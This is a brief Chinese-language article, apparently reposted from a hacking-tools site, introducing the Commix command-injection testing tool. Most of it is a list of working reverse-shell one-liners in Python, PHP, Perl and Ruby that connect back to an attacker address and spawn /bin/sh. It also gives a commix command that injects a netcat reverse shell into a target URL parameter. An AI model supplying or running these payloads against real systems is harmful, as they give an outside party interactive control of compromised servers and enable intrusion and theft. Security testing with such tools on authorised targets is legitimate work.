Commix – 自动化命令注入测试与利用工具
项目首页:
https://github.com/stasinopoulos/commix
项目简介:
Commix是一个使用Python开发的漏洞测试工具,这个工具是为了方便的检测一个请求是否存在命令注入漏洞,并且对其进行测试,在其作者发布的最新版本中支持直接直接导入burp的历史记录进行检测,大大提高了易用性。
在作者所写的使用案例中还附送了一些反弹shell的技巧,如下:
1. Python-reverse-shell:
python-c'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.178.3",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
2. PHP-reverse-shell:
php-r'$sock=fsockopen("192.168.178.3",1234);exec("/bin/sh -i <%263 >%263 2>%263");'
3. Perl-reverse-shell:
perl-e'use Socket;$i="192.168.178.3";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">%26S");open(STDOUT,">%26S");open(STDERR,">%26S");exec("/bin/sh -i");};'
4. Ruby-reverse-shell:
ruby-rsocket-e'exit
if fork;c=TCPSocket.new("192.168.178.3",1234);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
使用方法:
root@kali:~/commix# python commix.py --url="http://192.168.178.4/cmd/normal.php?addr=INJECT_HERE" --os-cmd="nc -e /bin/sh 192.168.178.3 1234"
对于具体的测试方法与利用模块的开发可以去其github进行阅读。
文章出处:黑客工具箱